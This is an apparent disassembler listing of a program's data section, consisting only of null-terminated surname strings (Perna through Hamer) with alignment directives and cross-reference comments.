aPerna db 'Perna',0 ; DATA XREF: .data:0043D1F0�o
align 10h
aPerlman db 'Perlman',0 ; DATA XREF: .data:0043D1EC�o
aPerlak db 'Perlak',0 ; DATA XREF: .data:0043D1E8�o
align 10h
aPerko db 'Perko',0 ; DATA XREF: .data:0043D1E4�o
align 4
aPereira db 'Pereira',0 ; DATA XREF: .data:0043D1E0�o
aPenny db 'Penny',0 ; DATA XREF: .data:0043D1DC�o
align 4
aPeishel db 'Peishel',0 ; DATA XREF: .data:0043D1D8�o
aPederson db 'Pederson',0 ; DATA XREF: .data:0043D1D4�o
align 4
aPearlberg db 'Pearlberg',0 ; DATA XREF: .data:0043D1D0�o
align 4
aPeabody db 'Peabody',0 ; DATA XREF: .data:0043D1CC�o
aPaynter db 'Paynter',0 ; DATA XREF: .data:0043D1C8�o
aPawloski db 'Pawloski',0 ; DATA XREF: .data:0043D1C4�o
align 4
aPavlon db 'Pavlon',0 ; DATA XREF: .data:0043D1C0�o
align 4
aPavetti db 'Pavetti',0 ; DATA XREF: .data:0043D1BC�o
aPattullo db 'Pattullo',0 ; DATA XREF: .data:0043D1B8�o
align 10h
aPatrick db 'Patrick',0 ; DATA XREF: .data:0043D1B4�o
aPatefield db 'Patefield',0 ; DATA XREF: .data:0043D1B0�o
align 4
aPascucci db 'Pascucci',0 ; DATA XREF: .data:0043D1AC�o
align 10h
aPartridge db 'Partridge',0 ; DATA XREF: .data:0043D1A8�o
align 4
aParris db 'Parris',0 ; DATA XREF: .data:0043D1A4�o
align 4
aParmeggiani db 'Parmeggiani',0 ; DATA XREF: .data:0043D1A0�o
aPaoletti db 'Paoletti',0 ; DATA XREF: .data:0043D19C�o
align 4
aPantilla db 'Pantilla',0 ; DATA XREF: .data:0043D198�o
align 4
aPanizzon db 'Panizzon',0 ; DATA XREF: .data:0043D194�o
align 4
aPanadero db 'Panadero',0 ; DATA XREF: .data:0043D190�o
align 10h
aPalmitesta db 'Palmitesta',0 ; DATA XREF: .data:0043D18C�o
align 4
aPallara db 'Pallara',0 ; DATA XREF: .data:0043D188�o
aPalepu db 'Palepu',0 ; DATA XREF: .data:0043D184�o
align 4
aPalayoor db 'Palayoor',0 ; DATA XREF: .data:0043D180�o
align 4
aPaine db 'Paine',0 ; DATA XREF: .data:0043D17C�o
align 10h
aPaesdealmeida db 'PaesDealmeida',0 ; DATA XREF: .data:0043D178�o
align 10h
aOvid db 'Ovid',0 ; DATA XREF: .data:0043D174�o
align 4
aOuchida db 'Ouchida',0 ; DATA XREF: .data:0043D170�o
aOtten db 'Otten',0 ; DATA XREF: .data:0043D16C�o
align 4
aOttaviani db 'Ottaviani',0 ; DATA XREF: .data:0043D168�o
align 4
aOstrowski db 'Ostrowski',0 ; DATA XREF: .data:0043D164�o
align 10h
aOspina db 'Ospina',0 ; DATA XREF: .data:0043D160�o
align 4
aOrsi db 'Orsi',0 ; DATA XREF: .data:0043D15C�o
align 10h
aOrfield db 'Orfield',0 ; DATA XREF: .data:0043D158�o
aOray db 'Oray',0 ; DATA XREF: .data:0043D154�o
align 10h
aOpel db 'Opel',0 ; DATA XREF: .data:0043D150�o
align 4
aOMeara db 'O',27h,'meara',0 ; DATA XREF: .data:0043D14C�o
aOman db 'Oman',0 ; DATA XREF: .data:0043D148�o
align 4
aOMalley db 'O',27h,'malley',0 ; DATA XREF: .data:0043D144�o
align 4
aOlszewski db 'Olszewski',0 ; DATA XREF: .data:0043D140�o
align 10h
aOlson db 'Olson',0 ; DATA XREF: .data:0043D13C�o
align 4
aOlsen db 'Olsen',0 ; DATA XREF: .data:0043D138�o
align 10h
aOldford db 'Oldford',0 ; DATA XREF: .data:0043D134�o
aOHagan db 'O',27h,'hagan',0 ; DATA XREF: .data:0043D130�o
aOh db 'Oh',0 ; DATA XREF: .data:0043D12C�o
align 4
aOgata db 'Ogata',0 ; DATA XREF: .data:0043D128�o
align 4
aOcougne db 'Ocougne',0 ; DATA XREF: .data:0043D124�o
aNuzum db 'Nuzum',0 ; DATA XREF: .data:0043D120�o
align 4
aNotman db 'Notman',0 ; DATA XREF: .data:0043D11C�o
align 4
aNitabach db 'Nitabach',0 ; DATA XREF: .data:0043D118�o
align 10h
aNisenson db 'Nisenson',0 ; DATA XREF: .data:0043D114�o
align 4
aNickoloff db 'Nickoloff',0 ; DATA XREF: .data:0043D110�o
align 4
aNickerson db 'Nickerson',0 ; DATA XREF: .data:0043D10C�o
align 4
aNi_0 db 'Ni',0 ; DATA XREF: .data:0043D108�o
align 4
aNg db 'Ng',0 ; DATA XREF: .data:0043D104�o
align 4
aNewlin db 'Newlin',0 ; DATA XREF: .data:0043D100�o
align 4
aNewfeld db 'Newfeld',0 ; DATA XREF: .data:0043D0FC�o
aNeuman db 'Neuman',0 ; DATA XREF: .data:0043D0F8�o
align 4
aNesci db 'Nesci',0 ; DATA XREF: .data:0043D0F4�o
align 4
aNenna db 'Nenna',0 ; DATA XREF: .data:0043D0F0�o
align 4
aNelson db 'Nelson',0 ; DATA XREF: .data:0043D0EC�o
align 4
aNayduch db 'Nayduch',0 ; DATA XREF: .data:0043D0E8�o
aNaviaux db 'Naviaux',0 ; DATA XREF: .data:0043D0E4�o
aNardone db 'Nardone',0 ; DATA XREF: .data:0043D0E0�o
aNardi db 'Nardi',0 ; DATA XREF: .data:0043D0DC�o
align 4
aNapolitano db 'Napolitano',0 ; DATA XREF: .data:0043D0D8�o
align 4
aNaddeo db 'Naddeo',0 ; DATA XREF: .data:0043D0D4�o
align 10h
aMussachio db 'Mussachio',0 ; DATA XREF: .data:0043D0D0�o
align 4
aMumford db 'Mumford',0 ; DATA XREF: .data:0043D0CC�o
aMulroy db 'Mulroy',0 ; DATA XREF: .data:0043D0C8�o
align 4
aMulkern db 'Mulkern',0 ; DATA XREF: .data:0043D0C4�o
aMugnai db 'Mugnai',0 ; DATA XREF: .data:0043D0C0�o
align 4
aMuello db 'Muello',0 ; DATA XREF: .data:0043D0BC�o
align 4
aMudarri db 'Mudarri',0 ; DATA XREF: .data:0043D0B8�o
aMotooka db 'Motooka',0 ; DATA XREF: .data:0043D0B4�o
aMostafavi db 'Mostafavi',0 ; DATA XREF: .data:0043D0B0�o
align 10h
aMosler db 'Mosler',0 ; DATA XREF: .data:0043D0AC�o
align 4
aMosher db 'Mosher',0 ; DATA XREF: .data:0043D0A8�o
align 10h
aMortimer db 'Mortimer',0 ; DATA XREF: .data:0043D0A4�o
align 4
aMorrow db 'Morrow',0 ; DATA XREF: .data:0043D0A0�o
align 4
aMorrison db 'Morrison',0 ; DATA XREF: .data:0043D09C�o
align 10h
aMoreton db 'Moreton',0 ; DATA XREF: .data:0043D098�o
aMorani db 'Morani',0 ; DATA XREF: .data:0043D094�o
align 10h
aMooredech_ db 'MooreDeCh.',0 ; DATA XREF: .data:0043D090�o
align 4
aMontilio db 'Montilio',0 ; DATA XREF: .data:0043D08C�o
align 4
aMonque db 'Monque',0 ; DATA XREF: .data:0043D088�o
align 10h
aMoiamedi db 'Moiamedi',0 ; DATA XREF: .data:0043D084�o
align 4
aMohr db 'Mohr',0 ; DATA XREF: .data:0043D080�o
align 4
aMoeller db 'Moeller',0 ; DATA XREF: .data:0043D07C�o
aModestino db 'Modestino',0 ; DATA XREF: .data:0043D078�o
align 4
aMocroft db 'Mocroft',0 ; DATA XREF: .data:0043D074�o
aMittal db 'Mittal',0 ; DATA XREF: .data:0043D070�o
align 4
aMitropoulos db 'Mitropoulos',0 ; DATA XREF: .data:0043D06C�o
aGonzalez db 'Gonzalez',0 ; DATA XREF: .data:0043D068�o
align 10h
aMinichiello db 'Minichiello',0 ; DATA XREF: .data:0043D064�o
aMini db 'Mini',0 ; DATA XREF: .data:0043D060�o
align 4
aMinh db 'Minh',0 ; DATA XREF: .data:0043D05C�o
align 4
aMills db 'Mills',0 ; DATA XREF: .data:0043D058�o
align 4
aMieher db 'Mieher',0 ; DATA XREF: .data:0043D054�o
align 4
aMiddle db 'Middle',0 ; DATA XREF: .data:0043D050�o
align 4
aMichelman db 'Michelman',0 ; DATA XREF: .data:0043D04C�o
align 10h
aMeurer db 'Meurer',0 ; DATA XREF: .data:0043D048�o
align 4
aMetropolis db 'Metropolis',0 ; DATA XREF: .data:0043D044�o
align 4
aMetelka db 'Metelka',0 ; DATA XREF: .data:0043D040�o
aMerz db 'Merz',0 ; DATA XREF: .data:0043D03C�o
align 4
aMerseth db 'Merseth',0 ; DATA XREF: .data:0043D038�o
aMerminod db 'Merminod',0 ; DATA XREF: .data:0043D034�o
align 4
aMerlani db 'Merlani',0 ; DATA XREF: .data:0043D030�o
aMerikoski db 'Merikoski',0 ; DATA XREF: .data:0043D02C�o
align 4
aMenzies db 'Menzies',0 ; DATA XREF: .data:0043D028�o
aMemisoglu db 'Memisoglu',0 ; DATA XREF: .data:0043D024�o
align 10h
aMeccariello db 'Meccariello',0 ; DATA XREF: .data:0043D020�o
aMcnulty db 'Mcnulty',0 ; DATA XREF: .data:0043D01C�o
aMcnealy db 'Mcnealy',0 ; DATA XREF: .data:0043D018�o
aMclaren db 'Mclaren',0 ; DATA XREF: .data:0043D014�o
aMclane db 'Mclane',0 ; DATA XREF: .data:0043D010�o
align 4
aMckenna db 'Mckenna',0 ; DATA XREF: .data:0043D00C�o
aMcintosh db 'Mcintosh',0 ; DATA XREF: .data:0043D008�o
align 10h
aMcilroy db 'McIlroy',0 ; DATA XREF: .data:0043D004�o
aMcgoldrick db 'Mcgoldrick',0 ; DATA XREF: .data:0043D000�o
align 4
aMcghee db 'Mcghee',0 ; DATA XREF: .data:0043CFFC�o
align 4
aMcfadden db 'McFadden',0 ; DATA XREF: .data:0043CFF8�o
align 4
aMcelroy db 'Mcelroy',0 ; DATA XREF: .data:0043CFF4�o
aMcdowell db 'Mcdowell',0 ; DATA XREF: .data:0043CFF0�o
align 4
aMcclearn db 'Mcclearn',0 ; DATA XREF: .data:0043CFEC�o
align 4
aMccall db 'Mccall',0 ; DATA XREF: .data:0043CFE8�o
align 10h
aMccaffery db 'Mccaffery',0 ; DATA XREF: .data:0043CFE4�o
align 4
aMcbride db 'Mcbride',0 ; DATA XREF: .data:0043CFE0�o
aMazziotta db 'Mazziotta',0 ; DATA XREF: .data:0043CFDC�o
align 10h
aMazzali db 'Mazzali',0 ; DATA XREF: .data:0043CFD8�o
aMay db 'May',0 ; DATA XREF: .data:0043CFD4�o
aMauzy db 'Mauzy',0 ; DATA XREF: .data:0043CFD0�o
align 4
aMattson db 'Mattson',0 ; DATA XREF: .data:0043CFCC�o
aMatsukata db 'Matsukata',0 ; DATA XREF: .data:0043CFC8�o
align 4
aMatarazzo db 'Matarazzo',0 ; DATA XREF: .data:0043CFC4�o
align 4
aMatalka db 'Matalka',0 ; DATA XREF: .data:0043CFC0�o
aMass db 'Mass',0 ; DATA XREF: .data:0043CFBC�o
align 4
aMarubini db 'Marubini',0 ; DATA XREF: .data:0043CFB8�o
align 10h
aMarton db 'Marton',0 ; DATA XREF: .data:0043CFB4�o
align 4
aMartochio db 'Martochio',0 ; DATA XREF: .data:0043CFB0�o
align 4
aMartinez db 'Martinez',0 ; DATA XREF: .data:0043CFAC�o
align 10h
aMarques db 'Marques',0 ; DATA XREF: .data:0043CFA8�o
aMargetts db 'Margetts',0 ; DATA XREF: .data:0043CFA4�o
align 4
aMargalit db 'Margalit',0 ; DATA XREF: .data:0043CFA0�o
align 10h
aMarcus db 'Marcus',0 ; DATA XREF: .data:0043CF9C�o
align 4
aMarchbanks db 'Marchbanks',0 ; DATA XREF: .data:0043CF98�o
align 4
aMarch db 'March',0 ; DATA XREF: .data:0043CF94�o
align 4
aMantovan db 'Mantovan',0 ; DATA XREF: .data:0043CF90�o
align 4
aManganiello db 'Manganiello',0 ; DATA XREF: .data:0043CF8C�o
aMandel db 'Mandel',0 ; DATA XREF: .data:0043CF88�o
align 4
aManalis db 'Manalis',0 ; DATA XREF: .data:0043CF84�o
aMalova db 'Malova',0 ; DATA XREF: .data:0043CF80�o
align 4
aMaller db 'Maller',0 ; DATA XREF: .data:0043CF7C�o
align 4
aMalatesta db 'Malatesta',0 ; DATA XREF: .data:0043CF78�o
align 10h
aMaisano db 'Maisano',0 ; DATA XREF: .data:0043CF74�o
aMaineHershey db 'Maine-Hershey',0 ; DATA XREF: .data:0043CF70�o
align 4
aMaier db 'Maier',0 ; DATA XREF: .data:0043CF6C�o
align 10h
aMahony db 'Mahony',0 ; DATA XREF: .data:0043CF68�o
align 4
aMaggio db 'Maggio',0 ; DATA XREF: .data:0043CF64�o
align 10h
aMadigan db 'Madigan',0 ; DATA XREF: .data:0043CF60�o
aMacy db 'Macy',0 ; DATA XREF: .data:0043CF5C�o
align 10h
aMacmillan db 'MacMillan',0 ; DATA XREF: .data:0043CF58�o
align 4
aMackenney db 'Mackenney',0 ; DATA XREF: .data:0043CF54�o
align 4
aMacintyre db 'Macintyre',0 ; DATA XREF: .data:0043CF50�o
align 4
aMaceachern db 'Maceachern',0 ; DATA XREF: .data:0043CF4C�o
align 10h
aMacdonald db 'Macdonald',0 ; DATA XREF: .data:0043CF48�o
align 4
aMaccormac db 'Maccormac',0 ; DATA XREF: .data:0043CF44�o
align 4
aMa db 'Ma',0 ; DATA XREF: .data:0043CF40�o
align 4
aLuzader db 'Luzader',0 ; DATA XREF: .data:0043CF3C�o
aLutcavage db 'Lutcavage',0 ; DATA XREF: .data:0043CF38�o
align 10h
aLussier db 'Lussier',0 ; DATA XREF: .data:0043CF34�o
aLuoma db 'Luoma',0 ; DATA XREF: .data:0043CF30�o
align 10h
aLunetta db 'Lunetta',0 ; DATA XREF: .data:0043CF2C�o
aLuecke db 'Luecke',0 ; DATA XREF: .data:0043CF28�o
align 10h
aLuczkow db 'Luczkow',0 ; DATA XREF: .data:0043CF24�o
aLuciano db 'Luciano',0 ; DATA XREF: .data:0043CF20�o
aLucas db 'Lucas',0 ; DATA XREF: .data:0043CF1C�o
align 4
aLubin db 'Lubin',0 ; DATA XREF: .data:0043CF18�o
align 10h
aLoza db 'Loza',0 ; DATA XREF: .data:0043CF14�o
align 4
aLowenstein db 'Lowenstein',0 ; DATA XREF: .data:0043CF10�o
align 4
aLoveman db 'Loveman',0 ; DATA XREF: .data:0043CF0C�o
aLoss db 'Loss',0 ; DATA XREF: .data:0043CF08�o
align 4
aLongworth db 'Longworth',0 ; DATA XREF: .data:0043CF04�o
align 10h
aLocatelli db 'Locatelli',0 ; DATA XREF: .data:0043CF00�o
align 4
aLizardo db 'Lizardo',0 ; DATA XREF: .data:0043CEFC�o
aLivolsi db 'Livolsi',0 ; DATA XREF: .data:0043CEF8�o
aLivi db 'Livi',0 ; DATA XREF: .data:0043CEF4�o
align 4
aLivernash db 'Livernash',0 ; DATA XREF: .data:0043CEF0�o
align 10h
aLitvak db 'Litvak',0 ; DATA XREF: .data:0043CEEC�o
align 4
aLittle db 'Little',0 ; DATA XREF: .data:0043CEE8�o
align 10h
aLipponen db 'Lipponen',0 ; DATA XREF: .data:0043CEE4�o
align 4
aLippmann db 'Lippmann',0 ; DATA XREF: .data:0043CEE0�o
align 4
aLinzee db 'Linzee',0 ; DATA XREF: .data:0043CEDC�o
align 10h
aLinehan db 'Linehan',0 ; DATA XREF: .data:0043CED8�o
aLine db 'Line',0 ; DATA XREF: .data:0043CED4�o
align 10h
aLinder db 'Linder',0 ; DATA XREF: .data:0043CED0�o
align 4
aLinda db 'Linda',0 ; DATA XREF: .data:0043CECC�o
align 10h
aLinares db 'Linares',0 ; DATA XREF: .data:0043CEC8�o
aLim db 'Lim',0 ; DATA XREF: .data:0043CEC4�o
aLightfoot db 'Lightfoot',0 ; DATA XREF: .data:0043CEC0�o
align 4
aLight db 'Light',0 ; DATA XREF: .data:0043CEBC�o
align 10h
aLiem db 'Liem',0 ; DATA XREF: .data:0043CEB8�o
align 4
aLidano db 'Lidano',0 ; DATA XREF: .data:0043CEB4�o
align 10h
aLiakos db 'Liakos',0 ; DATA XREF: .data:0043CEB0�o
align 4
aLessi db 'Lessi',0 ; DATA XREF: .data:0043CEAC�o
align 10h
aLesser db 'Lesser',0 ; DATA XREF: .data:0043CEA8�o
align 4
aLEnclos db 'l',27h,'Enclos',0 ; DATA XREF: .data:0043CEA4�o
align 4
aLenard db 'Lenard',0 ; DATA XREF: .data:0043CEA0�o
align 4
aLeite db 'Leite',0 ; DATA XREF: .data:0043CE9C�o
align 4
aLeclercq db 'Leclercq',0 ; DATA XREF: .data:0043CE98�o
align 10h
aLecce db 'Lecce',0 ; DATA XREF: .data:0043CE94�o
align 4
aLecar db 'Lecar',0 ; DATA XREF: .data:0043CE90�o
align 10h
aLawless db 'Lawless',0 ; DATA XREF: .data:0043CE8C�o
aLashley db 'Lashley',0 ; DATA XREF: .data:0043CE88�o
aLaserna db 'Laserna',0 ; DATA XREF: .data:0043CE84�o
aLanzit db 'Lanzit',0 ; DATA XREF: .data:0043CE80�o
align 10h
aLantieri db 'Lantieri',0 ; DATA XREF: .data:0043CE7C�o
align 4
aLankes db 'Lankes',0 ; DATA XREF: .data:0043CE78�o
align 4
aLandes db 'Landes',0 ; DATA XREF: .data:0043CE74�o
align 4
aLallemant db 'Lallemant',0 ; DATA XREF: .data:0043CE70�o
align 4
aLaing db 'Laing',0 ; DATA XREF: .data:0043CE6C�o
align 10h
aLafler db 'Lafler',0 ; DATA XREF: .data:0043CE68�o
align 4
aLabunka db 'Labunka',0 ; DATA XREF: .data:0043CE64�o
aLa db 'La',0 ; DATA XREF: .data:0043CE60�o
align 4
aKuwabara db 'Kuwabara',0 ; DATA XREF: .data:0043CE5C�o
align 10h
aKusman db 'Kusman',0 ; DATA XREF: .data:0043CE58�o
align 4
aKumar db 'Kumar',0 ; DATA XREF: .data:0043CE54�o
align 10h
aKuenzli db 'Kuenzli',0 ; DATA XREF: .data:0043CE50�o
aKrysiak db 'Krysiak',0 ; DATA XREF: .data:0043CE4C�o
aKroemer db 'Kroemer',0 ; DATA XREF: .data:0043CE48�o
aKraus db 'Kraus',0 ; DATA XREF: .data:0043CE44�o
align 10h
aKrasney db 'Krasney',0 ; DATA XREF: .data:0043CE40�o
aKrailo db 'Krailo',0 ; DATA XREF: .data:0043CE3C�o
align 10h
aKraemer db 'Kraemer',0 ; DATA XREF: .data:0043CE38�o
aKovaks db 'Kovaks',0 ; DATA XREF: .data:0043CE34�o
align 10h
aKotter db 'Kotter',0 ; DATA XREF: .data:0043CE30�o
align 4
aKorzybski db 'Korzybski',0 ; DATA XREF: .data:0043CE2C�o
align 4
aKool db 'Kool',0 ; DATA XREF: .data:0043CE28�o
align 4
aKonrad db 'Konrad',0 ; DATA XREF: .data:0043CE24�o
align 4
aKoniaris db 'Koniaris',0 ; DATA XREF: .data:0043CE20�o
align 10h
aKommer db 'Kommer',0 ; DATA XREF: .data:0043CE1C�o
align 4
aKoivumaki db 'Koivumaki',0 ; DATA XREF: .data:0043CE18�o
align 4
aKohn db 'Kohn',0 ; DATA XREF: .data:0043CE14�o
align 4
aKoch db 'Koch',0 ; DATA XREF: .data:0043CE10�o
align 4
aKobrick db 'Kobrick',0 ; DATA XREF: .data:0043CE0C�o
aKnuff db 'Knuff',0 ; DATA XREF: .data:0043CE08�o
align 4
aKlint db 'Klint',0 ; DATA XREF: .data:0043CE04�o
align 4
aKlinkenborg db 'Klinkenborg',0 ; DATA XREF: .data:0043CE00�o
aKling db 'Kling',0 ; DATA XREF: .data:0043CDFC�o
align 10h
aKlemperer db 'Klemperer',0 ; DATA XREF: .data:0043CDF8�o
align 4
aKleinfelder db 'Kleinfelder',0 ; DATA XREF: .data:0043CDF4�o
aKleiman db 'Kleiman',0 ; DATA XREF: .data:0043CDF0�o
aKleckner db 'Kleckner',0 ; DATA XREF: .data:0043CDEC�o
align 4
aKittridge db 'Kittridge',0 ; DATA XREF: .data:0043CDE8�o
align 4
aKirscht db 'Kirscht',0 ; DATA XREF: .data:0043CDE4�o
aKippenberger db 'Kippenberger',0 ; DATA XREF: .data:0043CDE0�o
align 10h
aKinsley db 'Kinsley',0 ; DATA XREF: .data:0043CDDC�o
aKindall db 'Kindall',0 ; DATA XREF: .data:0043CDD8�o
aKimura db 'Kimura',0 ; DATA XREF: .data:0043CDD4�o
align 4
aKimmett db 'Kimmett',0 ; DATA XREF: .data:0043CDD0�o
aKimmel db 'Kimmel',0 ; DATA XREF: .data:0043CDCC�o
align 4
aKhong db 'Khong',0 ; DATA XREF: .data:0043CDC8�o
align 10h
aKeul db 'Keul',0 ; DATA XREF: .data:0043CDC4�o
align 4
aKerry db 'Kerry',0 ; DATA XREF: .data:0043CDC0�o
align 10h
aKendall db 'Kendall',0 ; DATA XREF: .data:0043CDBC�o
aKemsley db 'Kemsley',0 ; DATA XREF: .data:0043CDB8�o
aKempton db 'Kempton',0 ; DATA XREF: .data:0043CDB4�o
aKelsey db 'Kelsey',0 ; DATA XREF: .data:0043CDB0�o
align 10h
aKelker db 'Kelker',0 ; DATA XREF: .data:0043CDAC�o
align 4
aKeith db 'Keith',0 ; DATA XREF: .data:0043CDA8�o
align 10h
aKeepper db 'Keepper',0 ; DATA XREF: .data:0043CDA4�o
aKeenan db 'Keenan',0 ; DATA XREF: .data:0043CDA0�o
align 10h
aKee db 'Kee',0 ; DATA XREF: .data:0043CD9C�o
aKawachi db 'Kawachi',0 ; DATA XREF: .data:0043CD98�o
aKasten db 'Kasten',0 ; DATA XREF: .data:0043CD94�o
align 4
aKassower db 'Kassower',0 ; DATA XREF: .data:0043CD90�o
align 10h
aKarpouzes db 'Karpouzes',0 ; DATA XREF: .data:0043CD8C�o
align 4
aKangis db 'Kangis',0 ; DATA XREF: .data:0043CD88�o
align 4
aKamel db 'Kamel',0 ; DATA XREF: .data:0043CD84�o
align 4
aKalman db 'Kalman',0 ; DATA XREF: .data:0043CD80�o
align 4
aKalinowski db 'Kalinowski',0 ; DATA XREF: .data:0043CD7C�o
align 10h
aKalil db 'Kalil',0 ; DATA XREF: .data:0043CD78�o
align 4
aKaligian db 'Kaligian',0 ; DATA XREF: .data:0043CD74�o
align 4
aKalbfleisch db 'Kalbfleisch',0 ; DATA XREF: .data:0043CD70�o
aKafadar db 'Kafadar',0 ; DATA XREF: .data:0043CD6C�o
aKaboolian db 'Kaboolian',0 ; DATA XREF: .data:0043CD68�o
align 4
aKabbash db 'Kabbash',0 ; DATA XREF: .data:0043CD64�o
aJulious db 'Julious',0 ; DATA XREF: .data:0043CD60�o
aJuliano db 'Juliano',0 ; DATA XREF: .data:0043CD5C�o
aJucks db 'Jucks',0 ; DATA XREF: .data:0043CD58�o
align 4
aJorgensen db 'Jorgensen',0 ; DATA XREF: .data:0043CD54�o
align 10h
aJolly db 'Jolly',0 ; DATA XREF: .data:0043CD50�o
align 4
aJohns db 'Johns',0 ; DATA XREF: .data:0043CD4C�o
align 10h
aJohannsen db 'Johannsen',0 ; DATA XREF: .data:0043CD48�o
align 4
aJohannesson db 'Johannesson',0 ; DATA XREF: .data:0043CD44�o
aJewett db 'Jewett',0 ; DATA XREF: .data:0043CD40�o
align 10h
aJespersen db 'Jespersen',0 ; DATA XREF: .data:0043CD3C�o
align 4
aJenkins db 'Jenkins',0 ; DATA XREF: .data:0043CD38�o
aJellis db 'Jellis',0 ; DATA XREF: .data:0043CD34�o
align 4
aJeffers db 'Jeffers',0 ; DATA XREF: .data:0043CD30�o
aJay db 'Jay',0 ; DATA XREF: .data:0043CD2C�o
aJarrell db 'Jarrell',0 ; DATA XREF: .data:0043CD28�o
aJarnagin db 'Jarnagin',0 ; DATA XREF: .data:0043CD24�o
align 4
aJanjigian db 'Janjigian',0 ; DATA XREF: .data:0043CD20�o
align 4
aJamil db 'Jamil',0 ; DATA XREF: .data:0043CD1C�o
align 10h
aJain db 'Jain',0 ; DATA XREF: .data:0043CD18�o
align 4
aJagoe db 'Jagoe',0 ; DATA XREF: .data:0043CD14�o
align 10h
aJagger db 'Jagger',0 ; DATA XREF: .data:0043CD10�o
align 4
aJagers db 'Jagers',0 ; DATA XREF: .data:0043CD0C�o
align 10h
aJackson db 'Jackson',0 ; DATA XREF: .data:0043CD08�o
aJacenko db 'Jacenko',0 ; DATA XREF: .data:0043CD04�o
aIyer db 'Iyer',0 ; DATA XREF: .data:0043CD00�o
align 4
aIsserman db 'Isserman',0 ; DATA XREF: .data:0043CCFC�o
align 4
aIsbill db 'Isbill',0 ; DATA XREF: .data:0043CCF8�o
align 4
aIsaievych db 'Isaievych',0 ; DATA XREF: .data:0043CCF4�o
align 4
aIsaac db 'Isaac',0 ; DATA XREF: .data:0043CCF0�o
align 10h
aInniss db 'Inniss',0 ; DATA XREF: .data:0043CCEC�o
align 4
aInamura db 'Inamura',0 ; DATA XREF: .data:0043CCE8�o
aIgarashi db 'Igarashi',0 ; DATA XREF: .data:0043CCE4�o
align 4
aIchikawa db 'Ichikawa',0 ; DATA XREF: .data:0043CCE0�o
align 4
aIaquinta db 'Iaquinta',0 ; DATA XREF: .data:0043CCDC�o
align 4
aHyde db 'Hyde',0 ; DATA XREF: .data:0043CCD8�o
align 4
aHutchings db 'Hutchings',0 ; DATA XREF: .data:0043CCD4�o
align 4
aHurtubise db 'Hurtubise',0 ; DATA XREF: .data:0043CCD0�o
align 4
aHupp db 'Hupp',0 ; DATA XREF: .data:0043CCCC�o
align 4
aHuntington db 'Huntington',0 ; DATA XREF: .data:0043CCC8�o
align 4
aHungerford db 'Hungerford',0 ; DATA XREF: .data:0043CCC4�o
align 4
aHuidekoper db 'Huidekoper',0 ; DATA XREF: .data:0043CCC0�o
align 10h
aHuey db 'Huey',0 ; DATA XREF: .data:0043CCBC�o
align 4
aHoy db 'Hoy',0 ; DATA XREF: .data:0043CCB8�o
aHoward db 'Howard',0 ; DATA XREF: .data:0043CCB4�o
align 4
aHottle db 'Hottle',0 ; DATA XREF: .data:0043CCB0�o
align 4
aHostage db 'Hostage',0 ; DATA XREF: .data:0043CCAC�o
aHoshida db 'Hoshida',0 ; DATA XREF: .data:0043CCA8�o
aHorsley db 'Horsley',0 ; DATA XREF: .data:0043CCA4�o
aHopkins db 'Hopkins',0 ; DATA XREF: .data:0043CCA0�o
aHooker db 'Hooker',0 ; DATA XREF: .data:0043CC9C�o
align 4
aHolzman db 'Holzman',0 ; DATA XREF: .data:0043CC98�o
aHolway db 'Holway',0 ; DATA XREF: .data:0043CC94�o
align 4
aHolter db 'Holter',0 ; DATA XREF: .data:0043CC90�o
align 4
aHoloien db 'Holoien',0 ; DATA XREF: .data:0043CC8C�o
aHolmes db 'Holmes',0 ; DATA XREF: .data:0043CC88�o
align 4
aHokoda db 'Hokoda',0 ; DATA XREF: .data:0043CC84�o
align 4
aHokanson db 'Hokanson',0 ; DATA XREF: .data:0043CC80�o
align 10h
aHoffman db 'Hoffman',0 ; DATA XREF: .data:0043CC7C�o
aHoffer db 'Hoffer',0 ; DATA XREF: .data:0043CC78�o
align 10h
aHock db 'Hock',0 ; DATA XREF: .data:0043CC74�o
align 4
aHoang db 'Hoang',0 ; DATA XREF: .data:0043CC70�o
align 10h
aHitchcock db 'Hitchcock',0 ; DATA XREF: .data:0043CC6C�o
align 4
aHirst db 'Hirst',0 ; DATA XREF: .data:0043CC68�o
align 4
aHind db 'Hind',0 ; DATA XREF: .data:0043CC64�o
align 4
aHimmelfarb db 'Himmelfarb',0 ; DATA XREF: .data:0043CC60�o
align 4
aHeyeck db 'Heyeck',0 ; DATA XREF: .data:0043CC5C�o
align 10h
aHeubert db 'Heubert',0 ; DATA XREF: .data:0043CC58�o
aHester db 'Hester',0 ; DATA XREF: .data:0043CC54�o
align 10h
aHerrera db 'Herrera',0 ; DATA XREF: .data:0043CC50�o
aHernandez db 'Hernandez',0 ; DATA XREF: .data:0043CC4C�o
align 4
aHenrichs db 'Henrichs',0 ; DATA XREF: .data:0043CC48�o
align 10h
aHenery db 'Henery',0 ; DATA XREF: .data:0043CC44�o
align 4
aHemphill db 'Hemphill',0 ; DATA XREF: .data:0043CC40�o
align 4
aHelprin db 'Helprin',0 ; DATA XREF: .data:0043CC3C�o
aHellmiss db 'Hellmiss',0 ; DATA XREF: .data:0043CC38�o
align 4
aHellman db 'Hellman',0 ; DATA XREF: .data:0043CC34�o
aHeiland db 'Heiland',0 ; DATA XREF: .data:0043CC30�o
aHeft db 'Heft',0 ; DATA XREF: .data:0043CC2C�o
align 10h
aHeermans db 'Heermans',0 ; DATA XREF: .data:0043CC28�o
align 4
aHazlewood db 'Hazlewood',0 ; DATA XREF: .data:0043CC24�o
align 4
aHaynes db 'Haynes',0 ; DATA XREF: .data:0043CC20�o
align 10h
aHayes db 'Hayes',0 ; DATA XREF: .data:0043CC1C�o
align 4
aHawkes db 'Hawkes',0 ; DATA XREF: .data:0043CC18�o
align 10h
aHaviaras db 'Haviaras',0 ; DATA XREF: .data:0043CC14�o
align 4
aHarwell db 'Harwell',0 ; DATA XREF: .data:0043CC10�o
aHartnett db 'Hartnett',0 ; DATA XREF: .data:0043CC0C�o
align 10h
aHartmann db 'Hartmann',0 ; DATA XREF: .data:0043CC08�o
align 4
aHartman db 'Hartman',0 ; DATA XREF: .data:0043CC04�o
aHarrigan db 'Harrigan',0 ; DATA XREF: .data:0043CC00�o
align 10h
aHarlow db 'Harlow',0 ; DATA XREF: .data:0043CBFC�o
align 4
aHargraves db 'Hargraves',0 ; DATA XREF: .data:0043CBF8�o
align 4
aHarding db 'Harding',0 ; DATA XREF: .data:0043CBF4�o
aHanssen db 'Hanssen',0 ; DATA XREF: .data:0043CBF0�o
aHand db 'Hand',0 ; DATA XREF: .data:0043CBEC�o
align 4
aHammerness db 'Hammerness',0 ; DATA XREF: .data:0043CBE8�o
align 4
aHamer db 'Hamer',0 ; DATA XREF: .data:0043CBE4�o
align 10h
